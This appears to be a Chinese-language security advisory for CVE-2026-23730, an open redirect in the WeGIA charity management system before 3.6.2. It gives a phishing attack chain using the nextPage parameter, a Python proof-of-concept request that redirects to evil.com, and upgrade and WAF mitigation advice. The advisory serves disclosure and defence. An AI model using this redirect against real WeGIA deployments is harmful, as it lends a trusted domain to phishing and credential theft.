CVE-2026-23730 CVSS 6.1 中危

CVE-2026-23730 WeGIA开放重定向漏洞

披露日期: 2026-01-16

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-23730

漏洞类型

开放重定向 (Open Redirect)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WeGIA

漏洞概述

WeGIA是一款面向慈善机构的Web管理系统。在3.6.2之前的版本中，WeGIA应用的/WeGIA/controle/control.php端点存在开放重定向漏洞。攻击者可通过操控nextPage参数，结合metodo=listarTodos和nomeClasse=ProdutoControle等参数，将用户重定向到任意外部网站。由于重定向发生在受信任的WeGIA域名下，攻击者可利用此漏洞进行网络钓鱼攻击、凭据窃取、恶意软件分发以及社会工程攻击。该漏洞已被分配CVE-2026-23730，CVSS评分6.1（中等严重程度）。漏洞已在3.6.2版本中修复。

技术细节

该漏洞存在于WeGIA的control.php控制器中。当应用程序处理HTTP请求时，nextPage参数未被正确验证或限制，攻击者可构造恶意URL将用户重定向到钓鱼网站。漏洞利用条件包括：1) 请求路径为/WeGIA/controle/control.php；2) 参数metodo设置为listarTodos；3) 参数nomeClasse设置为ProdutoControle；4) 参数nextPage包含恶意重定向目标（如http://evil.com）。由于应用程序仅检查nextPage参数存在性而未验证其内容是否属于可信域名，导致攻击者可利用受信任域名进行钓鱼攻击。攻击者可通过邮件、即时通讯或恶意网页诱骗用户点击构造的链接。

攻击链分析

STEP 1

步骤1

攻击者构造恶意链接：通过在nextPage参数中注入外部URL（如http://evil.com），结合metodo=listarTodos和nomeClasse=ProdutoControle参数

STEP 2

步骤2

攻击者通过钓鱼邮件、即时通讯或社交工程手段诱骗目标用户点击该恶意链接

STEP 3

步骤3

用户访问恶意链接后，浏览器向WeGIA服务器发送请求

STEP 4

步骤4

WeGIA应用未验证nextPage参数，直接返回302重定向响应，将用户浏览器重定向到攻击者控制的恶意网站

STEP 5

步骤5

用户在看似可信的WeGIA域名下被引导至钓鱼页面，可能输入凭据或下载恶意软件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-23730 PoC - WeGIA Open Redirect
# Target: WeGIA < 3.6.2
# Endpoint: /WeGIA/controle/control.php

target_url = "http://target.com/WeGIA/controle/control.php"

# Malicious redirect target
malicious_url = "http://evil.com/phishing"

# Construct exploit URL with nextPage parameter
params = {
    "metodo": "listarTodos",
    "nomeClasse": "ProdutoControle",
    "nextPage": malicious_url
}

# Send crafted request
response = requests.get(target_url, params=params, allow_redirects=False)

# Check for Location header with malicious URL
if response.status_code in [301, 302, 303, 307, 308]:
    location = response.headers.get("Location", "")
    if malicious_url in location:
        print("[+] Open Redirect Vulnerability Confirmed!")
        print(f"[+] Redirects to: {location}")
    else:
        print("[-] No redirect to malicious URL detected")
else:
    print(f"[-] Unexpected status code: {response.status_code}")

影响范围

WeGIA < 3.6.2

防御指南

临时缓解措施

立即升级WeGIA至3.6.2版本。在升级前，可通过Web应用防火墙（WAF）规则临时阻止包含nextPage参数且值以http://或https://开头的请求，或限制该参数只能包含相对路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表